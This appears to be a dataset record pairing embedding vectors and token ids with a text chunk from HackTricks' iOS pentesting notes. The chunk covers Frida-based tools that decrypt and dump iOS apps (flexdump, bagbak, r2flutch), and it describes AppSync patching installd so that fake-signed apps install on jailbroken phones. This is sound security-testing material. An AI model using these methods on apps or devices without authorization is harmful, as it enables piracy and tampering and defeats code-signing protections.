0.5642695426940918, 1.2737233638763428, -0.10147929936647415, 0.3342845141887665, -0.5484915971755981, -0.06439342349767685, -0.19971297681331635, 0.3360098898410797, -0.22191336750984192, 0.19634883105754852, 0.3332867920398712, -0.1519298404455185, -0.39030390977859497, 0.5372463464736938, -0.5135152339935303, 0.05527256429195404, -0.38434037566185, 0.02133125811815262, -0.11217991262674332, 0.6432167887687683, -0.3937547206878662, 0.5169934630393982, -0.26205703616142273, 0.4675517678260803, -0.9305440783500671, -0.470890074968338, -0.14200164377689362, 0.4610641896724701, 0.004806100856512785, 0.2346675544977188, -0.11037413775920868, 0.20348912477493286, 0.9806424379348755, 0.551189661026001, 0.08641406893730164, 0.12802711129188538, 0.22508805990219116, 0.26636651158332825, 0.13421231508255005, 0.3511112332344055, 0.46351638436317444, 0.7286114692687988, 0.131954625248909, 0.5217822194099426, -0.4741322994232178, -0.2660296857357025, -0.026182828471064568, -0.43852370977401733, -0.6523069739341736, 0.8824201226234436, -0.7780599594116211, 0.3731052279472351, 0.2604597508907318, 0.1946973353624344, -0.9901524186134338, -0.6167179346084595, -0.453419953584671, -1.411687970161438, -0.552269697189331, 0.08075972646474838, -0.08337721973657608, 0.7365564107894897, -0.6032820343971252, -0.014316217973828316, 0.8706665635108948, 0.5509376525878906, -0.41023513674736023, 0.28363046050071716, 0.933250904083252, 0.2653902471065521, -0.7418562173843384, -0.3947080969810486, 0.30987682938575745, -0.5713353157043457, -0.11238070577383041, 0.5070352554321289, -0.05266886204481125, -0.02529793605208397, -0.4610922336578369, 0.5961469411849976, 0.882992148399353, 0.2624873220920563, -0.10561327636241913, -0.29361388087272644, -0.1949421912431717, 0.8051566481590271, -0.5645280480384827, 0.0178421288728714, -0.016205744817852974, 0.3790186643600464, 0.3993282914161682, 1.334100604057312, 0.287658154964447, -0.2054171860218048, 0.4711814224720001, 0.415373295545578, 0.21251632273197174, -0.2670401334762573, 0.11757481843233109, 0.9564238786697388, 0.341499924659729, 0.12258219718933105, 0.40165427327156067, 0.13470704853534698, -0.47669973969459534, 0.08888585865497589, 0.04734095558524132, 0.3524494469165802, -0.3433550000190735, 1.0331778526306152, 0.8550682663917542, -0.006105866748839617, -0.5956313610076904, -0.6902288794517517, 0.973517656326294, 0.8672896027565002, -0.2626722753047943, -0.6778489351272583, 0.2768107056617737, 0.03606511279940605, -0.6468486189842224, 0.0037957464810460806, 0.3384978771209717, 0.6129979491233826, -0.30050304532051086, 0.32379791140556335, -0.10820078104734421, -0.2460736632347107, -0.36090967059135437, -0.3417273163795471, -0.7393068075180054, -0.2107628732919693, -0.5247172713279724, -0.0003984466311521828, 0.29202255606651306, -0.42705419659614563, 1.027834415435791, -0.1053624227643013, -0.2307431697845459, 0.10744502395391464, -0.21729564666748047, 0.38871753215789795, 0.34219831228256226, -0.3117091655731201, -1.0747153759002686, 0.31694719195365906, 0.6907083988189697, 0.781170666217804, -0.20318256318569183, -0.02385236881673336, -0.45411208271980286, 0.27864256501197815, -0.07317440211772919, -0.3850218951702118, 0.3139168918132782, 0.2318497598171234, -0.22008195519447327, 0.36733606457710266, 0.7298329472541809, 0.06117620691657066, 0.6424184441566467, -0.3125557005405426, 0.15088507533073425, 0.29562288522720337, 0.2241213023662567, -0.09321017563343048, 0.6218499541282654, 0.27295976877212524, -0.49965155124664307, 0.4083847403526306, -0.5742692351341248, 0.9891698956489563, -0.6442895531654358, 0.41278302669525146, 0.4191778600215912, 0.19221200048923492, 0.08934856206178665, -0.2841995060443878, -0.18995949625968933, -0.2847048044204712, -0.30233559012413025, -0.38214781880378723, 0.1129060760140419, -0.029052304103970528, 0.08954589068889618, -0.6561437845230103, 0.4381033480167389, -0.3913749158382416, -0.2887742519378662, 0.07338627427816391, -0.2893163561820984, 0.5540819764137268, -0.09335331618785858, 0.3808527886867523, -0.09930667281150818, -0.1835545003414154, 0.034989528357982635, -0.2292822301387787, 0.21517221629619598, -0.663576066493988, 0.3080533742904663, 0.4396894872188568, -0.6285961866378784, 0.8114959001541138, 0.5312457084655762, -0.49245989322662354, -0.26500609517097473, -0.2841072678565979, -0.3503526449203491, -0.3888011872768402, 0.5224917531013489, 0.23770356178283691, -0.04831356555223465, 0.7180795073509216, 0.07897687703371048, -0.4641769528388977, 0.49712857604026794, 0.4043411314487457, 0.14627057313919067, 0.21583177149295807, 0.2748982906341553, 0.5859354138374329, -0.22738982737064362, -0.4818211793899536, -0.5433489680290222, 0.13656243681907654, 0.5941380262374878, -0.3851357102394104, 0.8423135280609131, -0.4378671944141388, 0.015497037209570408, 0.18612541258335114, -0.6006033420562744, -0.6421672105789185, 0.6950435042381287, -0.08415623754262924, -0.040578968822956085, -0.4423470199108124, 0.314921110868454, 0.05690298229455948, 0.15979154407978058, 0.555713951587677, 0.37738537788391113, -0.22044895589351654, -0.6147029399871826, -0.3810633718967438, -0.03190608322620392, -0.2633070945739746, 0.38339731097221375, -0.06689758598804474, 0.0027341817039996386, -0.5155625343322754, -0.7564833164215088, -0.7632632255554199, 0.6424984335899353, 0.46313661336898804, 0.9730450510978699, 0.20416714251041412, 0.6084160208702087, 0.46572044491767883, 0.05026507005095482, 0.5658366680145264, -0.7185636758804321, 0.4656372666358948, -0.1827760487794876, 0.619660496711731, -0.7627688050270081, 0.16683222353458405, -0.16964416205883026, -0.10531330108642578, -0.43585771322250366, -0.03315957263112068, 0.004879244603216648, 0.009314422495663166, -0.617748498916626, -0.07865826040506363, -0.29041773080825806, 0.08801667392253876, -0.6094967722892761, -0.3137446939945221, -0.2650007903575897, 0.3827682435512543, 0.27191588282585144, -0.524669885635376, 0.264617919921875, -0.7367004156112671, 0.07913263887166977, 0.2047690898180008, 0.05816056206822395, -0.5105997323989868, -0.34980177879333496, -0.3289192020893097, -0.4894857406616211, 0.4199323058128357, 0.531265914440155, 0.11459603905677795, -0.2928107678890228, -1.3029285669326782, 0.039125315845012665, 0.461673766374588, -0.37104442715644836, -0.6854737997055054, 0.08330976963043213, 0.09709876775741577, 0.463032990694046, 0.2281865030527115, -0.1378459930419922, -0.36638572812080383, 0.5315958857536316, -0.21719890832901, 0.5004485249519348, -0.819379448890686, -0.0765928328037262, 0.16431470215320587, -0.13386057317256927, -0.15855899453163147, 0.26787179708480835, -0.5037497878074646, 0.040382470935583115, 0.3227700889110565, 0.3205999433994293, 0.17159631848335266, -0.6210722327232361, 0.6329901218414307, 0.008483351208269596, -0.34116238355636597, 0.09380374103784561, -0.0667673870921135, -0.056527458131313324, 0.1092812791466713, -0.2459404170513153, -0.37817686796188354, 0.8512489199638367, -0.48798632621765137, 0.7677541375160217, -0.07006514817476273, 0.03936818987131119, 0.41996923089027405, -0.44278863072395325, 0.45772382616996765, 0.26920825242996216, 0.0853857472538948, -0.6112157106399536, -0.8992237448692322, 0.31547969579696655, 0.09718041121959686, 0.1328490972518921, 0.3196343779563904, -0.04034021869301796, -0.06926319748163223, 0.029549485072493553, -0.3029867112636566, -0.9173241257667542, -0.8210406303405762, -0.7037837505340576, -0.24227148294448853, 0.3542361557483673, -0.221901535987854, 0.37266427278518677, -0.2106587290763855, -0.18509367108345032, 0.4832051992416382, -0.1927737593650818, 0.40055808424949646, -1.0010225772857666, -0.22778604924678802, -0.45083287358283997, 0.14261221885681152, -0.30951380729675293, 0.021739793941378593, 0.06418732553720474, -0.2072313129901886, 0.048212140798568726, 0.4181787669658661, 0.31911247968673706, -0.885844349861145, -0.9570940136909485, 0.8019514083862305, 0.4467628300189972, -0.4522285759449005, -0.02555214613676071, 0.6060888767242432, 0.07898642122745514, 0.19791021943092346, -0.24493512511253357, -0.3493073880672455, -0.7975075244903564, -0.7209539413452148, 0.024420198053121567, -0.8468352556228638, 0.4074069559574127, -0.5821372866630554, -0.7211846113204956, 0.07962046563625336, 0.3027041256427765, 0.5706497430801392, -0.6031688451766968, 0.05483822524547577, -0.11274196207523346, 0.028272481635212898, 0.08987603336572647, -0.16283489763736725, -0.13739146292209625, -0.1554843634366989, -0.57230144739151, 0.9304059743881226, 0.08164984732866287, -0.39127323031425476, -0.0393047034740448, -0.09567268192768097, 0.25066229701042175, 0.5845637321472168, -0.24913766980171204, -0.5025089383125305, -0.1331384778022766, 0.13575351238250732, -0.3936852216720581, 0.24757367372512817, -0.49308502674102783, 0.7818667888641357, -0.009826486930251122, -0.07289861887693405, -0.4303804636001587, -0.08381370455026627, -0.38454875349998474, 0.028402704745531082, 0.7190837264060974, -0.8189613223075867, -0.3162403702735901, -0.007131623104214668, 0.5441930890083313, 0.5400239825248718, -0.5041172504425049, -1.0980135202407837, 0.12447827309370041, -0.804344654083252, -0.4516924023628235, 0.17051592469215393, 0.2263200432062149, -0.05190098285675049, 0.025480132550001144, 0.19456085562705994, 0.34271034598350525, -0.38784366846084595, 0.20942912995815277, 0.8521696329116821, -0.17007608711719513, -0.09459100663661957, -1.0308347940444946, 0.3316217064857483, 0.3740249276161194, 0.2557729184627533, -0.42862990498542786, -0.6413184404373169, 0.09084102511405945, -0.10081559419631958, -0.6800124049186707, 0.004414927680045366, -0.6976467967033386, -0.3188107907772064, 0.42610853910446167, -0.4357389211654663, 0.42082804441452026, -0.180172860622406, -0.6549987196922302, -0.5649667382240295, 0.4367791414260864, 0.1963527649641037, -0.004867637064307928, 0.561689019203186, 0.49698829650878906, -0.02313164994120598, -0.5473790168762207, 0.30544206500053406, -0.317290335893631, 0.03832783177495003, 0.7161697149276733, 0.014092166908085346, -0.7054085731506348, 0.8780048489570618, 0.401841402053833, -1.0256998538970947, -0.2250937968492508, -0.7699787616729736, -0.7381001114845276, -0.40665504336357117, -0.3413831293582916, -0.11335541307926178, -0.03854217007756233, -0.01913072168827057, -0.25502026081085205, 0.9157243967056274, -0.060324449092149734, -0.15950962901115417, -0.6905052661895752, 0.7580721378326416, 0.020240413025021553, 0.3855809271335602, 0.858279824256897, -0.8000765442848206, -0.4091034531593323, -1.3345204591751099, 0.033671192824840546, -0.012833690270781517, 0.14371062815189362, 0.7781626582145691, -0.14830473065376282, 0.807062029838562, 0.2572873532772064, -0.12777090072631836, 0.7291032671928406, -0.2908453643321991, 0.0048982915468513966, 0.5994555354118347, 0.004401020240038633, -0.8615278005599976, -0.772902250289917, 0.12799935042858124, -0.13501903414726257, 0.3495045304298401, -0.8609020113945007, 0.04128937050700188, -0.00008594112296123058, 0.13637235760688782, 0.10027076303958893, -0.46100759506225586, -0.507835328578949, -0.5197315216064453, 0.20042437314987183, -0.3242782652378082, -0.49360227584838867, -0.27002212405204773, 0.3851315379142761, -0.11996535956859589, -0.463993638753891, -0.33536192774772644, 0.15751749277114868, -0.5271299481391907, 0.19602438807487488, -0.5185070633888245, 0.5474768280982971, -0.5292970538139343, -0.5969950556755066, -0.0955817699432373, -0.36357131600379944, -0.6435229182243347, -0.865233838558197, -0.012962181121110916, -0.11078299582004547, -0.5080291032791138, 0.750909686088562, -0.08954700827598572, -0.1933773159980774, 0.5647202730178833, -0.06381186097860336, 0.17301425337791443, 0.736255407333374, -0.2016301155090332, -0.15516622364521027, -0.09803708642721176, 0.20061899721622467, 0.40237945318222046, -0.5513081550598145, -0.08832802623510361, -0.4200511574745178, -0.11179565638303757, 0.00851693656295538, 0.39102405309677124, -0.4193407893180847, 0.11036591231822968, 0.1691097915172577, 0.04488229379057884, -0.145591601729393, -0.9125679731369019, -0.26992014050483704, 0.048243969678878784, 0.17251545190811157, -0.38946813344955444, 0.522361159324646, 0.5167019963264465, 0.28753191232681274, -0.6000176072120667, 0.9176170825958252, 0.33622434735298157, 0.27665406465530396, 0.4287569522857666, 0.07390008121728897, 0.22742779552936554, -0.32405951619148254, -0.12183964997529984, 0.4090747833251953, -0.18049897253513336, 0.7162671089172363, -0.0972101166844368, -0.01894809678196907, -0.3523732125759125, -0.05491252616047859, 0.6835523843765259, -0.0058432212099432945, 0.7179282307624817, -0.20673711597919464, 0.2051597535610199, 0.07123281806707382, -0.3163694143295288, -0.11991530656814575, -0.9913246631622314, -0.3406573235988617, -0.11893054097890854, 0.26908957958221436, -0.1668870598077774, -0.13819923996925354, -0.15326282382011414, 0.5020202994346619, 0.06119370460510254, -0.35006773471832275, 0.3832952678203583, 0.081095851957798, 0.24254558980464935, 1.3806827068328857, -0.46007025241851807, -0.2055922895669937, -0.44369158148765564, 0.628204345703125, -0.7703345417976379, -1.2499785423278809, 0.20041783154010773, 1.0167678594589233, 0.02584034390747547, -0.30670058727264404, -0.5855854153633118, -0.05480527877807617, 0.747875452041626, -0.024725865572690964, -0.027316413819789886, 0.2593429386615753, -0.5413730144500732, 0.9782066941261292, -0.5014892816543579, 0.28924331068992615, 0.12746287882328033, -0.5599209666252136, 0.537424623966217, 0.20639623701572418, -0.34112709760665894, -0.07258687168359756, 0.23257175087928772, 0.15207917988300323, 0.5114855170249939, 0.47565317153930664, 0.5006319284439087, -0.3406657874584198, 0.02032855898141861, -0.5179234743118286, 0.5578076839447021, 0.2650817334651947, 0.3669731616973877, -0.4151533544063568, 0.27627694606781006, 0.16092483699321747, -0.5879520773887634, -0.5850839018821716, 0.3463156819343567, 0.2667374014854431, -0.4552461802959442, 0.08599723875522614, -0.024530019611120224, 0.29491186141967773, 0.04675568640232086, -0.16088351607322693, -0.1891658902168274, -0.09716270864009857, 0.04077542573213577, 0.4328905940055847, -0.1970529556274414, 0.5360090136528015, -0.7561070322990417, 0.6251463890075684, -0.04430199787020683, -0.09947606176137924, 0.031351130455732346, 0.35357996821403503, -0.2685261070728302, 0.2636038064956665, 0.9786624908447266, 0.054175782948732376, -0.13755138218402863, 0.712965726852417, -0.1456422209739685, 0.27776557207107544, 0.2728835344314575, 0.1714118868112564, -0.9401529431343079, 0.13327836990356445, 0.21915864944458008, -0.3794603943824768, -0.8635581731796265, 0.04617719352245331, 0.1779552847146988, -0.22253435850143433, 0.14300835132598877, -0.21437200903892517, -0.06552354991436005, -0.5378835797309875, 0.16516552865505219, -0.21551859378814697, 0.29475584626197815, 0.3657113015651703, -0.4703521728515625, -0.19746628403663635, 0.7880614399909973, -0.4406282603740692, 0.6452961564064026, 0.13224869966506958, 0.902658224105835, 0.05887836217880249, 0.47510862350463867, 0.21410125494003296, -0.2806887924671173, -0.2802041172981262, -0.11548370867967606, -0.5492234230041504, -0.27182167768478394, 0.1096884161233902, -0.6770666837692261, 0.9248054623603821, -0.44051089882850647, -0.33754920959472656, -0.6396188735961914, -0.018418416380882263, -0.3829321265220642, -0.8632717728614807, 0.4922587275505066, -0.45852768421173096, -0.1839532107114792, 0.10582712292671204, 0.5235009789466858, 0.539012610912323, 0.23797212541103363, -0.28745800256729126, 0.018739864230155945, -0.7110463380813599, -0.1553853303194046, -0.6313836574554443, 0.7539827227592468, -0.39226192235946655, -0.5573887825012207, 0.6991001963615417, -1.1261708736419678, -0.493966668844223, 0.14729945361614227, -0.4904516339302063, -0.37583401799201965, 0.5911051034927368, 0.36957675218582153, 0.6193036437034607, -0.06379963457584381, -0.4875171482563019, -0.3821844756603241, -0.05724405124783516, 0.578835129737854, -0.4154232144355774, 0.7457839846611023, 0.4522295892238617, 0.3077928125858307, 0.3651745915412903, -0.21537576615810394, 0.32680919766426086, -0.20987264811992645, 0.32237371802330017, -0.40136539936065674, -0.06862229108810425, -0.7567437291145325, -0.22348645329475403, 0.026596851646900177, -0.015450662933290005, 0.3139248788356781, -0.10716177523136139, -0.9588639140129089, 0.2321041375398636, -0.5554932355880737, -0.03363027051091194, 0.3288147747516632, -0.062409888952970505, 0.541861355304718, 0.5987735986709595, 0.46236586570739746, -1.2448424100875854, 4.641442775726318, 0.5934138298034668, 0.17189307510852814, 0.17070981860160828, 0.009630724787712097, 0.2423962652683258, 1.0983694791793823, -0.728046715259552, 0.5453433990478516, 0.2530612647533417, 0.29254576563835144, -0.2471866011619568, 0.2979866564273834, 0.20252437889575958, 0.20934413373470306, 0.5294070243835449, -0.2715260982513428, 0.06419229507446289, 0.22115670144557953, -1.1029276847839355, -0.7141098976135254, -0.2169860303401947, -0.22332966327667236, 0.8789563775062561, 0.9080290198326111, -0.1975899636745453, 0.4191657602787018, -0.16268189251422882, -0.2285076230764389, -0.11575502902269363, -0.061561305075883865, -0.21059252321720123, -0.0026040340308099985, -0.623576283454895, -0.33981412649154663, -0.007412628270685673, 0.002812448190525174, -1.0940288305282593, -0.13334158062934875, 0.3311080038547516, 0.3110232949256897, 0.37497133016586304, 0.22150248289108276, -0.45475661754608154, -0.2127942442893982, 0.4962546229362488, -0.3864312469959259, 0.1715277135372162, 0.5675102472305298, -1.102841854095459, 0.2961242198944092, -0.060693226754665375, 0.8348681926727295, -0.20566485822200775, -0.5709382891654968, -0.13628585636615753, -0.07629650086164474, -0.3398095965385437, 0.24495144188404083, 0.22130700945854187, 0.21676580607891083, -0.5073633193969727, -0.0391615629196167, -0.054684266448020935, -0.7250087857246399, 0.7933143973350525, -0.21592827141284943, 0.31375551223754883, -0.012329366989433765, 0.10738500207662582, -0.32848063111305237, -0.2856995463371277, -1.0789986848831177, -0.21048207581043243, 0.476153701543808, -0.02299054153263569, 0.10302137583494186, 0.3554522395133972, 0.452262818813324, -0.527364194393158, -0.3507422208786011, -0.3927386701107025, -0.4615124762058258, 0.3621100187301636, 0.745995819568634, 0.9564291834831238, 0.048435959964990616, -0.8430049419403076, 0.2633635997772217, 0.34688621759414673, 0.33711886405944824, 0.09352995455265045, -0.3413975238800049, -0.12220678478479385, 0.16682347655296326 ]
[ 1012, 10093, 13910, 2527, 1012, 10013, 14117, 2102, 1996, 4539, 10439, 6887, 1012, 10093, 13910, 2527, 1012, 10013, 8566, 8737, 2075, 23921, 2000, 1013, 13075, 1013, 19622, 2015, 1013, 1053, 2860, 1013, 1043, 2480, 22610, 1035, 1022, 1035, 1050, 2575, 20348, 2487, 2278, 1035, 1048, 2860, 4160, 2581, 2361, 4160, 2629, 2243, 2692, 29537, 8889, 16206, 1013, 1056, 1031, 10424, 8524, 1011, 16380, 1011, 15653, 1033, 1024, 3873, 16150, 2243, 1012, 7705, 2038, 2042, 8209, 1012, 1031, 10424, 8524, 1011, 16380, 1011, 15653, 1033, 1024, 7170, 2695, 8758, 1012, 7705, 3112, 1012, 1031, 10424, 8524, 1011, 16380, 1011, 15653, 1033, 1024, 5622, 5910, 9148, 6199, 8663, 2696, 16649, 1012, 1040, 8516, 12322, 2038, 2042, 21469, 26915, 1012, 1012, 1012, 1012, 2707, 15653, 1013, 2797, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 20652, 2475, 2094, 14142, 1011, 29491, 17134, 1011, 1018, 2546, 20952, 1011, 1038, 2094, 17788, 1011, 26314, 2546, 2581, 12740, 22025, 21486, 26224, 1013, 23921, 1012, 10439, 1013, 7705, 2015, 1013, 5622, 5910, 9148, 6199, 5332, 26876, 1012, 1040, 8516, 12322, 29521, 26760, 10128, 3215, 5714, 2094, 1012, 1040, 8516, 12322, 1012, 10882, 2094, 1024, 2531, 1003, 1064, 100, 1064, 27810, 2243, 1013, 27810, 2243, 1031, 4002, 1024, 4002, 1026, 4002, 1024, 4002, 1010, 1015, 1012, 5139, 14905, 1013, 1055, 1033, 2707, 15653, 1013, 2797, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 20652, 2475, 2094, 14142, 1011, 29491, 17134, 1011, 1018, 2546, 20952, 1011, 1038, 2094, 17788, 1011, 26314, 2546, 2581, 12740, 22025, 21486, 26224, 1013, 23921, 1012, 10439, 1013, 7705, 2015, 1013, 5622, 5910, 9148, 6199, 17345, 2850, 2696, 1012, 1040, 8516, 12322, 29521, 26760, 10128, 13535, 19574, 6790, 1012, 1040, 8516, 12322, 1012, 10882, 2094, 1024, 2531, 1003, 1064, 100, 1064, 6445, 1012, 1019, 2243, 1013, 6445, 1012, 1019, 2243, 1031, 4002, 1024, 4002, 1026, 4002, 1024, 4002, 1010, 4700, 2581, 2243, 2497, 1013, 1055, 1033, 1019, 1012, 1049, 2549, 2050, 1024, 3770, 1012, 1023, 14905, 1031, 4002, 1024, 2403, 1010, 1019, 1012, 5594, 14905, 1013, 1055, 1033, 1014, 1012, 4002, 2497, 1031, 4002, 1024, 4002, 1010, 1029, 1038, 1013, 1055, 1033, 11717, 1000, 23921, 1012, 24531, 1000, 2044, 2023, 1010, 1996, 23921, 1012, 24531, 5371, 2097, 2022, 2580, 1999, 2115, 2783, 14176, 1012, 2017, 2064, 9398, 3686, 1996, 3112, 1997, 1996, 15653, 2011, 9268, 1996, 10439, 1998, 19222, 9080, 2989, 2009, 1006, 1041, 1012, 1043, 1012, 2478, 16380, 1011, 21296, 16380, 1011, 21296, 1011, 1038, 23921, 1012, 24531, 1007, 1012, 3602, 2008, 2023, 2097, 2069, 2147, 2006, 7173, 29162, 5733, 1010, 2004, 4728, 1996, 8085, 2180, 1005, 1056, 2022, 9398, 1012, 23951, 3207, 26775, 22571, 7629, 2344, 2000, 6855, 1996, 24531, 5371, 2013, 2019, 5361, 4646, 2017, 2064, 2036, 2224, 1996, 6994, 23951, 3207, 26775, 22571, 2102, 2030, 1037, 10236, 4842, 1997, 1996, 6994, 2170, 23951, 8566, 8737, 1012, 1999, 2151, 2553, 2017, 2097, 2342, 2000, 16500, 23951, 3207, 26775, 22571, 2102, 1999, 1996, 5080, 2770, 2242, 2066, 1024, 1059, 18150, 24471, 2140, 1011, 1045, 23951, 3207, 26775, 22571, 2102, 1012, 2139, 19892, 2213, 23951, 3207, 26775, 22571, 2102, 1012, 2139, 12733, 1999, 2344 ]
hack_tricks
436.txt
7
to use flexdump : apt install zip unzipwget url - p / usr / local / bin ; chmod + x / usr / local / bin / flexdumpflexdump list # list appsflexdump dump twitter. app # create. ipa file from appbagbakyet another frida based app decryptor. requires jailbroken ios device and frida. rebagbak - - raw chromer2flutchr2flutch is a tool that uses radare and frida to decrypt and dump ios apps > see the github for more information. installing appswhen you install an application without using apple's app store, this is called sideloading. there are various ways of sideloading which are described below. on the ios device, the actual installation process is then handled by the installd daemon, which will unpack and install the application. to integrate app services or be installed on an ios device, all applications must be signed with a certificate issued by apple. this means that the application can be installed only after successful code signature verification. on a jailbroken phone, however, you can circumvent this security feature with appsync, a package available in the cydia store. it contains numerous useful applications that leverage jailbreak - provided root privileges to execute advanced functionality. appsync is a tweak that patches installd, allowing the installation of fake - signed ipa packages. different methods exist for installing an ipa package onto an ios device, which are described in detail below. please note that itunes is no longer available in macos catalina. if you are using an older version of macos, itunes is still available but since itunes 12. 7 it is not possible to install apps. cydia impactorcydia impactor was originally created to jailbreak iphones, but has been rewritten to sign and install ipa packages to ios devices via sideloading ( and even apk files to android devices ). cydia impactor is available for windows, macos and linux. a step by step guide and troubleshooting steps are available on yalujailbreak. net. libimobiledeviceon linux and also macos, you can alternatively use libimobiledevice, a cross - platform software protocol library and a set of tools for native communication with ios devices. this allows you to install apps over a usb connection by executing ideviceinstaller. the connection is implemented with the
[ 0.12009768187999725, -0.5282378196716309, 0.03091491386294365, 0.03588511422276497, -0.6975663304328918, -0.25863945484161377, -0.027972916141152382, 0.5212270021438599, 0.26875510811805725, 0.7199162840843201, 0.11357445269823074, 0.22743110358715057, 0.6893077492713928, -0.8772786259651184, -0.2754985988140106, 0.04610875993967056, -0.38549062609672546, -0.22505025565624237, -0.584517240524292, -0.052333153784275055, 0.6832842230796814, -0.033497512340545654, -0.7042717933654785, -0.8098304867744446, -0.15613184869289398, 0.3002754747867584, 0.8489673733711243, -0.11153185367584229, 0.34218260645866394, 0.8634203672409058, 0.322308748960495, -0.08298573642969131, 0.17147867381572723, -0.728247880935669, 0.7126885056495667, -0.28040778636932373, 0.6178067326545715, -0.2618398070335388, 0.42047837376594543, -0.24095529317855835, 0.02266998589038849, -0.22729481756687164, -0.12725910544395447, -0.3666791617870331, -0.1603131890296936, -1.0140684843063354, -0.2194627821445465, -0.30598098039627075, 0.593520998954773, -0.4036422669887543, 0.2766849994659424, 0.11963304877281189, 0.0675872191786766, 0.3014931380748749, 0.17002375423908234, -0.015543611720204353, -0.025964394211769104, 0.1482565701007843, -0.5689127445220947, 0.5313974618911743, 0.07701290398836136, 0.6676831245422363, 0.30496010184288025, -0.47293543815612793, -0.46168509125709534, 0.48500141501426697, 0.13638034462928772, -0.17147478461265564, -0.26731076836586, -0.7455151677131653, -0.05296649783849716, 0.7510888576507568, -0.4593271315097809, -0.6237143874168396, 0.03526868298649788, -0.11572986096143723, 0.18286193907260895, -0.5211364030838013, -0.06437108665704727, 0.8913490176200867, -0.16300730407238007, 0.107502780854702, 0.27753886580467224, -0.3445732891559601, -0.005223418120294809, -0.2765990197658539, 0.3892956078052521, 0.7172771692276001, -0.06686867773532867, 0.14228177070617676, 0.5510841608047485, 0.1753198206424713, -0.9932286143302917, -0.2061161994934082, 0.8047064542770386, 1.054709553718567, -0.258563369512558, -0.06507988274097443, 0.3654615581035614, -0.18874746561050415, 1.0841888189315796, 0.08763948082923889, 0.5174459218978882, 0.4932064414024353, -0.17776891589164734, -0.06797900050878525, 0.032246027141809464, -0.24685119092464447, 0.1410645991563797, 0.15283049643039703, 0.27482327818870544, -0.08181384205818176, 0.6627747416496277, -0.5535610318183899, -0.08904853463172913, 0.08782695978879929, 0.48521432280540466, -0.15228527784347534, -0.24397897720336914, 0.42621079087257385, -0.02642916329205036, -0.5981393456459045, 0.03433666378259659, -0.08462344110012054, 0.15728513896465302, 0.08573334664106369, 0.22337284684181213, 0.7709587812423706, -0.8530202507972717, -0.3551343083381653, -0.12518401443958282, 0.007586531341075897, 0.704571545124054, 0.8602052927017212, -0.31601232290267944, 0.4261585474014282, 0.12938140332698822, 0.29460954666137695, 0.7045643925666809, -0.3719300925731659, 0.24613842368125916, 0.16674205660820007, -0.030419114977121353, 1.1262609958648682, 0.2367538958787918, 0.014520464465022087, -0.1395825743675232, -0.7569757699966431, 0.010601547546684742, 0.5122588872909546, -0.32673269510269165, 0.010332629084587097, 0.8940245509147644, -0.440192848443985, -0.6963739395141602, 0.33707743883132935, -0.2490220069885254, 0.46660780906677246, -0.23184658586978912, -0.06231515482068062, 0.013669098727405071, 0.6679284572601318, 0.10941971838474274, 0.30403900146484375, -0.7341315150260925, 0.22491447627544403, -0.34426307678222656, 0.13523709774017334, 0.056614723056554794, 0.26034826040267944, 0.09056675434112549, -0.21737553179264069, 0.16216056048870087, 0.053822096437215805, 1.6300519704818726, 0.5993684530258179, 0.1749928891658783, 0.13402606546878815, 0.22560378909111023, 0.4573303163051605, -0.8630088567733765, -0.007021894212812185, 0.11846812069416046, 0.8590480089187622, -0.33462876081466675, 0.3909251093864441, -0.4984757900238037, -0.7117813229560852, -0.042687512934207916, -0.17159461975097656, -0.40478184819221497, 0.5710607767105103, -0.5787847638130188, 0.25445476174354553, 0.42350369691848755, 0.2509588897228241, -0.9133835434913635, 0.1308683305978775, 0.19018179178237915, -1.836733102798462, -0.6474976539611816, 0.3169952929019928, -0.20081602036952972, 0.7384125590324402, -0.3513945937156677, -0.2351921647787094, 0.6472187638282776, 0.49538999795913696, -0.22984465956687927, 0.3996814787387848, 0.9302385449409485, -0.1442490518093109, -0.5643323659896851, 0.03566605970263481, -0.36016911268234253, -0.0662994384765625, 0.3161509931087494, 0.5961538553237915, 0.18244071304798126, 0.004920964129269123, -0.18767622113227844, 0.44881898164749146, 0.7734112739562988, 0.39802026748657227, -0.03990411013364792, -0.3588794767856598, -0.19553205370903015, 0.18349140882492065, -0.4943200945854187, 0.2623896300792694, -0.26266902685165405, 0.4795525074005127, 1.1400226354599, 1.3354780673980713, -0.2780700922012329, -0.3979613780975342, 0.3458871841430664, 0.11093553155660629, 0.2826119363307953, -0.21151109039783478, 0.3101361095905304, 1.1666836738586426, 0.4104537069797516, 0.3426660895347595, 0.1227702647447586, 0.44642719626426697, -0.022833000868558884, 0.5023715496063232, 0.6567373871803284, 0.4898431897163391, -0.2392772138118744, 0.8220002055168152, 0.5375972986221313, 0.28481248021125793, -0.8033973574638367, -0.7508406639099121, 0.3663325011730194, 0.9756525158882141, -0.6174017786979675, -0.8396990895271301, -0.26145997643470764, 0.013012459501624107, -0.17957842350006104, -0.3571808338165283, -0.12576577067375183, 0.39076539874076843, -0.5928741693496704, 0.6238186955451965, -0.41281208395957947, -0.726210355758667, -0.7544115781784058, -0.07697657495737076, -1.0597052574157715, -0.7760384678840637, -0.7471012473106384, 0.02752107009291649, -0.18872933089733124, 0.06330472975969315, 0.5248581767082214, -0.8298416137695312, -0.5180521011352539, 0.07526463270187378, 0.5454543828964233, 0.5325146317481995, 0.25136691331863403, -0.22730287909507751, -0.8397305011749268, -0.2790312170982361, 0.22864079475402832, 0.8452680706977844, -0.2523191273212433, -0.014659782871603966, -0.47669026255607605, -0.09141264855861664, -0.11675921827554703, 0.017676452174782753, 0.9305793046951294, 0.2624119520187378, -0.27247217297554016, 0.25760531425476074, 0.11800781637430191, 0.2507358193397522, 0.38198426365852356, -0.05194123089313507, 0.21092580258846283, 0.6043338179588318, 0.08553231507539749, -0.46797484159469604, 0.463011771440506, 0.1821640580892563, -0.7789943814277649, 0.2890856862068176, 0.2411397248506546, 0.9769184589385986, -0.812142014503479, -0.14753709733486176, 0.3966236412525177, -0.23940409719944, -0.0823962390422821, -0.0436854362487793, 0.04353797435760498, -0.5036449432373047, -0.44189542531967163, -0.15197338163852692, -0.12930701673030853, 0.21394388377666473, -0.17209158837795258, -1.0569486618041992, 0.4574456810951233, -0.29779431223869324, -0.2759336531162262, -0.0933791995048523, -0.5328141450881958, 0.9314882159233093, -0.08175870776176453, 0.2855524718761444, -0.37224870920181274, -0.4229862093925476, -0.06202716752886772, 0.08451168239116669, 0.22687362134456635, -0.6607348918914795, -0.07202976942062378, -0.04584965482354164, 0.008875076659023762, 0.6685369610786438, 0.4905695617198944, -0.6001468896865845, -0.3850274085998535, 